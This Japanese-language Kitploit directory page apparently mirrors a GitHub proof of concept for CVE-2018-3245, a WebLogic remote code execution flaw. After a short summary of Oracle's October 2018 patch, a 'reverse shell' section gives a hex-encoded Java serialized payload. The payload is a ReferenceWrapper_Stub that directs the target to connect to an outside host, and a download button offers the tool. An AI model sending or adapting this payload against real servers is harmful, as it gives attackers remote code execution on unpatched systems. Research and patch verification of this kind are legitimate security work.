Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2018-3245 — CVE-2018-3245 | Kitploit
ツール/GitHubGitHub/jas502n/cve-2018-3245
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubjas502n/cve-2018-3245

CVE-2018-3245

CVE-2018-3245

リポジトリを見る
14107年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Weblogic-CVE-2018-3245

CVE-2018-3245

0x00 概要

現地時間10月16日、北京時間10月17日未明、Oracle公式は10月(第3四半期)の重要パッチ更新CPU(Critical Patch Update)を発表しました。

このうち、7月(第2四半期)のCPUパッチで完全には修正されていなかった(CVE-2018-2893)Weblogicリモートコード実行の脆弱性が修正され、今回新たに修正された脆弱性の番号はCVE-2018-3245です。

解決策

Oracle公式は今回の重要パッチ更新(CPU)でこの脆弱性を修正しました。影響を受けるユーザーは、早急にアップデートを適用して保護することを強く推奨します。

注:Oracle公式パッチには正規ソフトウェアのライセンスアカウントが必要です。このアカウントでhttps://support.oracle.comにログインすると、最新パッチをダウンロードできます。

Oracle公式CPUリンク:

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html

0x01 リバースシェルの取得

root@kitploit:~
jas502n-poc.txt 

Payload(hex): aced00057372002f636f6d2e73756e2e6a6e64692e726d692e72656769737472792e5265666572656e6365577261707065725f5374756200000000000000020200007872001a6a6176612e726d692e7365727665722e52656d6f746553747562e9fedcc98be1651a0200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e0300007870773b000a556e696361737452656600127777772e63616e796f757365656d652e636300001a0c0000000009e0b68e00000000000000000000000000000078

ツールをダウンロード